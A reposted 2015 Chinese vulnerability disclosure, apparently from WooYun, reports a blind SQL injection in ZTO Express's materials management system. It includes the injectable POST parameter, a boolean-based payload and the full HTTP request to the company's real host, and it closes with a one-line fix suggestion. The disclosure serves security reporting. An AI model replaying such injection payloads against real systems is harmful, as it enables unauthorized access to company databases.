记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

中通速递物料管理系统SQL注入漏洞

2015-08-22 19:55
漏洞标题 中通速递物料管理系统SQL注入漏洞
相关厂商 中通速递
漏洞作者 专业种田
提交时间 2015-06-14 17:04
公开时间 2015-07-30 09:12
漏洞类型 SQL注射漏洞
危害等级
自评Rank 10
漏洞状态 厂商已经确认
Tags标签 oracle注入

漏洞详情

Place: POST
Parameter: Log_platform_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: target_pre_id=&mianDan.trace_type=&mianDan.Log_type=&target_type=&Log_platform_id=T1000072268' AND 4327=4327 AND 'Kexm'='Kexm&billType=3&beginTime=2015-06-11&endTime=2015-06-14&pager.pageNo=1&pager.pageSize=20&sort=Log_insert_time&direction=desc

POST /MianDan/GetMianDanOfPage HTTP/1.1
Host: wl.zt-express.com
Connection: keep-alive
Content-Length: 213
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://wl.zt-express.com
X-Requested-With: XMLHttpRequest
User-Agent:
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://wl.zt-express.com/systeminfo/MianDan/MianDanList.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie:

target_pre_id=&mianDan.trace_type=&mianDan.Log_type=&target_type=&Log_platform_id=T1000072268&billType=3&beginTime=2015-06-11&endTime=2015-06-14&pager.pageNo=1&pager.pageSize=20&sort=Log_insert_time&direction=desc

Log_platform_id注入参数

中通物料管理注入1.png

漏洞证明:

中通物料管理注入2.png

不跑数据了,Oracle

中通物料管理注入3.png

修复方案:

sql过滤

版权声明:转载请注明来源 专业种田@乌云


知识来源: www.secpulse.com/archives/35989.html

阅读:164336 | 评论:0 | 标签:漏洞 oracle注入 注入

想收藏或者和大家分享这篇好文章→复制链接地址

“中通速递物料管理系统SQL注入漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云